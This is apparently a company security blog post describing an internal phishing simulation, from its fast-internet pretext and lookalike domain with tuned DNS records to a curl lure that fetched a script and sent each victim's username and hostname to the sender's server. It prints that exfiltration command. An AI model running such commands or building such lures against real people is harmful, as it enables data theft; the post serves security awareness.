A Successful Phishing Attack Simulation
To raise awareness about scammers and prevent employees from leaking confidential data, Whatfix Infosec decided to conduct a phishing awareness training program.
Phishing is a type of cyberattack where an attacker poses as a trustworthy entity, such as a bank, employer, or email provider, and tricks the victim into giving sensitive information, such as passwords, credit card numbers, or social security numbers. The attacker usually does this through email.
The impact of a successful phishing attack can be severe, as the attacker can gain access to sensitive data, such as financial information or personal identification.
This article is divided into three sections: the first section discusses Social Engineering( psychological aspects), the second section discusses the Technical aspects, and the third section discusses the Outcomes of attacks.
- Social Engineering (Psychological Aspects):
The first part was to find a way to psychologically trick users into paying attention to the phishing email and make them believe that it was genuine. This is called social engineering.
We had many ideas, but we had to ensure that we used only publicly available information and that idea should catch the user’s attention and confidence.
Whether it was 5G or 4G, people always desired the fastest internet connection, so we decided to leverage this psychological fact.
We wrote the entire story on this fact and asked InfoSec team members to evaluate its potential effectiveness in phishing individuals. After receiving feedback, we incorporated the necessary changes into the email content that we planned to use against our targets.
The content appeared to be legitimate and trustworthy, giving it the potential to effectively deceive unsuspecting individuals.
2. Technical aspects:
To make our phishing simulation more realistic, we decided to register a domain(example.com) name which is similar to the organization domain. Additionally, to send a large volume of emails, we chose to use a reputed email-sending solution.
We also made a few modifications to the DNS records of example.com. These modifications were made to enhance the domain’s reputation and establish proper DMARC functionality. These DNS records play a crucial role in verifying the authenticity and integrity of the domain, ensuring that it is recognized as a reputable source of communication. To know more about DNS records responsible for mail delivery please read this article.
To proceed, we needed to identify victims who had fallen for the phishing attempt. To achieve this, we requested that the user execute specific commands in the terminal.
We implemented a straightforward curl command to download a script from the server. The script contained another curl command that sent a GET request including the username and hostname of the system to our server.
Thus, we decided to identify each user individually through this method, although, in hindsight, it was not a good idea.
Our plan was to extract the usernames and corresponding hostnames from the logs by analyzing the HTTP GET requests. Once we had confirmed that everything was functioning properly, we were prepared to go live.
At approximately 6 PM IST, we began sending emails to everyone and monitored the incoming requests through the logs. Initially, everything appeared to be working correctly, and legitimate requests were being received. However, as time went on, we began to notice an influx of false requests containing fabricated usernames and information.
So one tech-savvy dude saw the script’s code and began sending fake requests.
curl -X GET http://example.com/Lap-`hostname`-Name-`whoami`
He added a userlist in place of whoami and a fake hostname list in place of hostname and the whole query was inside a while loop.
As a result of this, we were inundated with an excessive amount of requests. Fortunately, we had a verified list of users and corresponding hostnames, allowing us to filter out the authentic data.
3. Outcome:
Upon the conclusion of our phishing attack simulation, we were able to infiltrate and obtain confidential information from individuals. Additionally, by involving and obtaining feedback from multiple individuals in the development of our social engineering tactics, we were able to create a narrative that appeared convincing and legitimate to the targets. However, our success was not without its obstacles, as we encountered a number of fake requests generated by a member. Nonetheless, we were able to utilize our verified list of users and hostnames to filter out the authentic data and achieve our desired outcome.
In our previous phishing attack, 10% of employees fell for it. This time, the percentage was 6%. This decrease shows that our awareness efforts were successful.
Moral of the story: The repercussions of the attack that was conducted in this case were so severe that they could be compared to the effects of gaining a reverse shell. Had the payload been a reverse shell instead of a simple curl command, the consequences would have been disastrous. Therefore, it is important to realize the gravity of such attacks and take necessary measures to prevent them.
Safeguard against phishing: Ways to safeguard against phishing attacks are by
- Verify the authenticity of the domain from which the emails are originating. It is essential to cross-check if the emails are coming from the right domain or not. In this case, the attackers sent emails from the domain “example.com”. Despite this, users were not able to identify that the emails were coming from an external source. Even Gmail flagged those emails as external, but users still failed to recognize the warning signs.
- Don’t click on links in emails from people you don’t know. If you’re not sure if an email is legitimate, hover your mouse over the link to see the actual URL. If the URL doesn’t look like it belongs to the company that supposedly sent the email, don’t click on it.
- Don’t give out personal information(PII data) in emails. If someone asks for this information in an email, it’s probably a phishing attack.
- Be wary of emails that seem urgent. Phishing attacks often try to create a sense of urgency by telling you that your account will be closed or that you’ve won a prize. If an email seems too good to be true, it probably is.
- Use a spam filter. A spam filter can help to reduce the number of phishing emails that you receive.
Hence, it is imperative to be vigilant and cautious while dealing with emails, especially those that ask for sensitive information and show the urgency of something. This will ensure that one does not fall prey to phishing attacks, which can lead to dire consequences.
To ensure the safety of the organization, it is highly recommended that users report any suspicious emails they receive to the InfoSec team. It is essential to take proactive steps to prevent potential threats and maintain the integrity of the system.
References:
https://en.wikipedia.org/wiki/Social_engineering_(security)
https://www.cloudflare.com/en-in/learning/dns/dns-records/dns-txt-record/
